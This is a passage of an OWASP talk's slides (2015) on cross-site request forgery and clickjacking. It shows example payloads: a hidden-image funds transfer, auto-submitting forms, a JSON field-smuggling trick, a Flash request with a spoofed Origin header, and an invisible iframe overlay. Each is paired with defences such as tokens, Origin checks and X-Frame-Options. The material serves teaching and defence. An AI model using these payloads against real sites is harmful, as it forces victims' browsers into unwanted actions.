CSRF and Clickjacking Prevention Techniques

Cross-site request forgery:
Ways to exploit, ways to prevent
Paulius Leščinskas, OWASP EEE Lithuania
2015-10-07

About Me
Paulius Leščinskas
Pod owner @ Adform
http://lescinskas.lt
Paulius.Lescinskas@gmail.com
@lescinskas
https://www.linkedin.com/in/pluton

Cross-site request forgery
(CSRF)
A CSRF attack forces a logged-on victim’s browser to send a forged HTTP request, including the
victim’s session cookie and any other automatically included authentication information, to a
vulnerable web application. This allows the attacker to force the victim’s browser to generate
requests the vulnerable application thinks are legitimate requests from the victim.
Thank you http://www.seclab.cs.sunysb.edu/seclab/jcsrf/ for the image.

(CSRF)
Typical impact:
• Initiate transactions (modify data)
• Access sensitive data
Prerequisite: victim MUST be logged-in to the target system.
Typical example:
<img src="http://example.com/app/transferFunds?
amount=1500&destinationAccount=attackersAcct#" width="0" height="0" />

(CSRF)
What about POST?

(CSRF)
Example 2 (POST request):
<form method="post" action="https://www.example.com/deleteUser">
<input type="hidden" name="id" value="1" />
</form>
<script>
document.forms[0].submit();
</script>

(CSRF)
No forms? Just RESTful JSON APIs?

(CSRF)
The same data will be sent differently as raw HTTP body. I.e.:
Name: John Doe
Text: 1 + 2 = 3
• Via HTML form (application/x-www-form-urlencoded):
Name=John+Doe&Text=1+%2B+2+%3D+3
• Using RESTful Web API formatted as JSON:
{"Text": "John Doe", "Text": "1 + 2 = 3"}

(CSRF)
Example 3 (POST JSON request, bypassing x-form-urlencoded structure):
<form method="post" action="https://www.example.com/deleteUser">
<input type="hidden" name='{id: 1, "ignore-me": "' value='test"}' />
</form>
<script>
document.forms[0].submit();
</script>
Data sent:
{"id": 1, "ignore-me": "=test"}
http://itsecurityconcepts.com/2014/04/22/csrf-on-json-requests/

(CSRF)
All HTTP methods (GET/POST/PUT/PATCH/DELETE ...) with any data encoding can be called using Javascript
(XmlHttpRequest aka XHR aka Ajax), if your Cross-origin resource sharing (CORS) headers allow you to call
XHR from any location:
OPTIONS /foo/bar
Host: example.com
Origin: http://foo.com
Vulnerable if:
Access-Control-Allow-Origin: *
jQuery example:
$.ajax({
url: 'http://example.com/foo/bar',
type: 'DELETE',
data: {"id": 1}
success: function(result) {
// Do something with the result
}
});

(CSRF)
Flash to the attack!

(CSRF)
Example 4 (any HTTP-based request using ActionScript):
import flash.net.URLRequest;
import flash.net.URLVariables;
import flash.net.URLRequestMethod;
import flash.net.URLRequestHeader;
import flash.net.URLLoader;
var loader:URLLoader = new URLLoader();
var req:URLRequest = new URLRequest("http://www.example.com/deleteUser");
var header:URLRequestHeader = new URLRequestHeader("Origin", "http://www.test.com"); // Setting Origin
header valid until Flash 9 somewhat
req.requestHeaders.push(header);
req.method = URLRequestMethod.DELETE;
req.contentType = 'application/json';
req.data = '{"id": 1}';
loader.load(req);

(CSRF)
... valid if example.com has crossdomain.xml like:
<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*" secure="false" />
</cross-domain-policy>
9/10 Lithuanian TOP10 websites has such crossdomain.xml
…mostly to load assets from flash-based banner ads.
... also, you can access ActionScript objects, functions and properties from the
SWF file, hosted on other domain, if this file has Security.allowDomain("*");
(Cross-scripting)

(CSRF)
Countermeasures
●
Synchronizer token pattern!
●
Check Origin header
●
Appropriate CORS headers
●
Appropriate crossdomain.xml rules
●
Short-living sessions (only reduces likelihood)
Very hard (impossible?) to prevent CSRF is website has XSS vulnerabilities
https://en.wikipedia.org/wiki/Cross-origin_resource_sharing
http://www.adobe.com/devnet/adobe-media-server/articles/cross-domain-xml-for-streaming.html
https://www.owasp.org/index.php/Cross-Site_Request_Forgery_(CSRF)_Prevention_Cheat_Sheet

ClickJacking
<html>
<body>
<iframe src="http://victim.site" style="position: absolute;
filter:alpha(opacity=0);opacity:0"></iframe>
<div style="position: relative; left: 10px; top: 10px; z-index: -1"><a
href="#">CLICK ME</a></div>
</body>
</html>
OVERRIDES ALL CSRF PROTECTIONS!
https://www.owasp.org/index.php/Clickjacking
http://www.troyhunt.com/2013/05/clickjack-attack-hidden-threat-right-in.html
https://community.qualys.com/blogs/securitylabs/2012/11/29/clickjacking-an-overlooked-web-security-hole

ClickJacking
Countermeasures
Framebusting: X-Frame-Options (XFO) response HTTP header or meta http-equiv
tag
X-Frame-Options: DENY (disallows page to be loaded in IFRAME)
X-Frame-Options: SAMEORIGIN (allows page to loaded in IFRAME from same origin)
X-Frame-Options: ALLOW-FROM https://trusted.domain (allows page to be loaded from
specific origins; unsupported by Chrome and Safari!)
Worldwide usage:
Facebook: DENY, Twitter: SAMEORIGIN, Github: DENY, 60% of Alexa Top 10 use framebusting...
https://www.owasp.org/index.php/Clickjacking_Defense_Cheat_Sheet (+more defense techniques)
https://www.owasp.org/index.php/Testing_for_Clickjacking_(OTG-CLIENT-009)
https://developer.mozilla.org/en-US/docs/Web/HTTP/X-Frame-Options

CSRF and Clickjacking Prevention Techniques

Recommended

Recommended

More Related Content

What's hot

What's hot (13)

Similar to CSRF and Clickjacking Prevention Techniques

Similar to CSRF and Clickjacking Prevention Techniques (20)

Recently uploaded

Recently uploaded (20)

CSRF and Clickjacking Prevention Techniques